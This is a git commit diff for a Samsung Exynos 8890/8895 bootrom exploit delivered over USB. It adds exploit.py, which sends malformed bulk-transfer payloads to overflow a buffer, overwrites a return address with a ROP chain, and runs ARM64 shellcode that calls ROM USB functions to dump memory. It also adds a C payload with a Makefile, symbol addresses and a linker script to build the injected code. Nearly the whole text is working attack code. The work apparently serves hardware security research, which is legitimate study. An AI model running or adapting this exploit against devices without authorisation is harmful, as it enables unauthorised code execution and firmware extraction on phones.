found another bug
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d7a740d173
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a9def4a27d
17
Makefile
Normal file
17
Makefile
Normal file
@ -0,0 +1,17 @@
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ifeq ($(ANDROID_NDK_ROOT),)
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$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20))
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endif
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CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang
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AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar
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OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy
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LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd
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#==================Target Samsung S7 (8890)==================
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CFLAGS_SAMSUNGS7 = -Os
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dwc3:
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$(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
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$(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
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$(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
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$(OBJCOPY) -O binary dwc3.elf dwc3.bin
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148
exploit.py
148
exploit.py
@ -1,6 +1,8 @@
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import usb.core
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import usb.util
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import struct, sys, usb1, libusb1, ctypes
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import struct, sys, usb1, libusb1, ctypes, usb
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from keystone import *
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from capstone import *
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# from ghidra_assistant.utils.utils import *
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def p32(x):
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@ -27,7 +29,7 @@ BOOTROM_SIZE = 0x20000 #128Kb
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TARGET_OFFSETS = {
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# XFER_BUFFER, RA_PTR, XFER_END_SIZE
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"8890": (0x02021800, 0x02020F08, 0x02070000),
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"8890": (0x02021800, 0x02020F08, 0x02070000),
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"8895": (0x02021800, 0x02020F18, 0x02070000)
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}
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@ -72,6 +74,26 @@ class ExynosDevice():
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
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assert(res == 0)
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return transfered
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def test_bug_2(self):
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# Also bug here
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# payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
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# self.write(payload, MAX_PAYLOAD_SIZE)
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# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
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transferred = ctypes.c_int()
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bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
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bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
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assert res == 0
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payload = b"\xaa" * 0x200
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
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assert res == 0
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payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
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pass
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def test_bug(self):
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# Start by sending a valid packet
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@ -109,11 +131,6 @@ class ExynosDevice():
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assert transferred.value == len(bug_payload), "Invalid transfered size"
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current_offset += len(bug_payload) - 8 # Remove header
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# Send the actual payload
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# res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
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# assert res == 0, "Error sending payload"
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# current_offset += len(payload)
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cnt = 0
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while True:
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if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
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@ -138,18 +155,129 @@ class ExynosDevice():
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rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
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transferred = ctypes.c_int(0)
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
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# assert transferred.value == len(rop_chain), "Error sending ROP chain"
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assert res == 0, "Error sending ROP chain"
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buf = ctypes.c_buffer(b"", 0x200000)
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
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# Send some data
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p = b"\xaa" * 0x200
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transferred.value = 0
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
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buf = ctypes.c_buffer(b"", 0x20000)
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
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# Should have received some bytes
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pass
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ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
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def usb_debug():
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shellcode = f"""
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start:
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adr x0, test_fun
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ldr x0, [x0]
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blr x0
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mov w1, #0x20000 // size
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mov w0, #0x0 // address
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bl usb_send
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mov x0, #0
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br x0 //reset
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#Setup read usb
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mov w0, #0x2
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adr x1, shellcode_base
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ldr x1, [x1]
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mov w2, #0x02020000
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add w2, w2, #0x2000
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# endpoint, cb, buffer
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adr x5, maybe_usb_setup_read
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ldr x5, [x5]
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blr x5
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# Get something?? arg0 is endpoint
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mov w0, #0x2
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adr x1, maybe_read_size_endpoint
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ldr x1, [x1]
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blr x1
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# # Send some data from ROM
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# mov w1, #0x200 // size
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# mov w0, #0x0 // address
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# bl usb_send
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# mov x0, #0
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# br x0 //reset
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# # dwc3_ep0_start_trans
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# mov w1, w0
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# mov w0, #0x2
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# mov w2, #0x200
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# adr x5, dwc3_ep0_start_trans
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# ldr x5, [x5]
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# blr x5
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# # Send some data from ROM
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# mov w1, #0x200 // size
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# mov w0, #0x0 // address
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# bl usb_send
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# mov x0, #0
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# br x0 //reset
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usb_send:
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stp x29, x30, [sp,#-48]!
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mov w3, #0x0
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bfxil w3, w1, #0, #24
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mov w1, #0xc12
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mov x29, sp
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stp x19, x20, [sp,#16]
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mov x5, #0xc834
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mov w20, #0x1
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movk x5, #0x1540, lsl #16
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ldr x2, [x29,#40]
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mov x4, #0xc838
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orr w6, w1, w20
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movk x4, #0x1540, lsl #16
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mov x19, #0xc83c
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movk x19, #0x1540, lsl #16
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stp w3, w1, [x2,#8]
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mov w3, #0x406
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stp w0, wzr, [x2]
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mov w0, w20
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ldr x1, [x29,#40]
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strb w6, [x2,#12]
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mov x2, #0x27c8
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str w1, [x5]
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mov w1, #0x1388
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str wzr, [x4]
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str w3, [x19]
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blr x2
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mov w0, w20
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ldr w1, [x19]
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ldp x19, x20, [sp,#16]
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ldp x29, x30, [sp],#48
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ret
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usb_read_endpoint: .quad 0x00006654
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maybe_usb_setup_read: .quad 0x00006f88
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shellcode_base: .quad 0x02021800
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maybe_read_size_endpoint: .quad 0x00007a7c
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dwc3_ep0_start_trans: .quad 0x0000791c
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test_fun: .quad 0x000064e0
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"""
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shellcode = ks.asm(shellcode, as_bytes=True)[0]
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shellcode = open("dwc3.bin", "rb").read()
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exynos = ExynosDevice()
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exynos.exploit(shellcode)
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if __name__ == "__main__":
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usb_debug()
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sys.exit(0)
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# wait_for_device()
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exynos = ExynosDevice()
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exynos.test_bug_2()
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path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
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# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
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exynos.exploit(open(path, "rb").read())
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5
symbols.txt
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5
symbols.txt
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maybe_usb_setup_read = 0x00006f88;
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dwc3_ep0_start_trans = 0x0000791c;
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usb_event_handler = 0x00007bac;
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get_endpoint_buffer = 0x00007a7c;
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sleep = 0x000027c8;
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57
test_dwc3.c
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57
test_dwc3.c
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@ -0,0 +1,57 @@
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#include <stdint.h>
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// Create external function at 0x00006f88
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extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
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extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
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extern int usb_event_handler(void);
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extern void * get_endpoint_buffer(char endpoint);
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extern void sleep(int endpoint,uint32_t timeout);
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#define recv_buffer 0x02021800 + 0x2000
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#define data_received 0x02021800 + 0x2004
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// do {
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// /* loops until image has been received */
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// usb_event_handler();
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// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
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// } while (iVar2 == 0);
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void recv_data_cb(uint32_t endpoint, uint32_t len){
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void *rbuf;
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void *dest_buf = (void *)recv_buffer;
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volatile void *dref = (void *)data_received;
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for(int i= 0; i < len; i++){
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rbuf = get_endpoint_buffer(2);
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*(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
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}
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// while(1){}
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// asm("mov x0, #0x0");
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// asm("br x0");
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*(uint8_t *)dref = 3;
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}
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void recv_data(){
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// Set data_received to 0
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// uint32_t *r = (uint32_t *) data_received;
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// r = 0;
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volatile void *dref = (void *)data_received;
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*(uint8_t *)dref = 0;
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maybe_usb_setup_read(2, recv_data_cb, 1);
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while(1){
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usb_event_handler();
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if(*(uint8_t *)dref == 3){
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break;
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}
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sleep(1, 10);
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}
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}
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int main() {
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recv_data();
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// recv_data();
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// sleep(1, 5000);
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asm("mov x0, #0x0");
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asm("br x0");
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}
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14
test_dwc3.ld
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14
test_dwc3.ld
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MEMORY {
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ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
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}
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SECTIONS
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{
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. = 0x02021800;
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.text . : {
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*(.text*)
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*(.data*)
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*(.rodata*)
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} >ROM
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}
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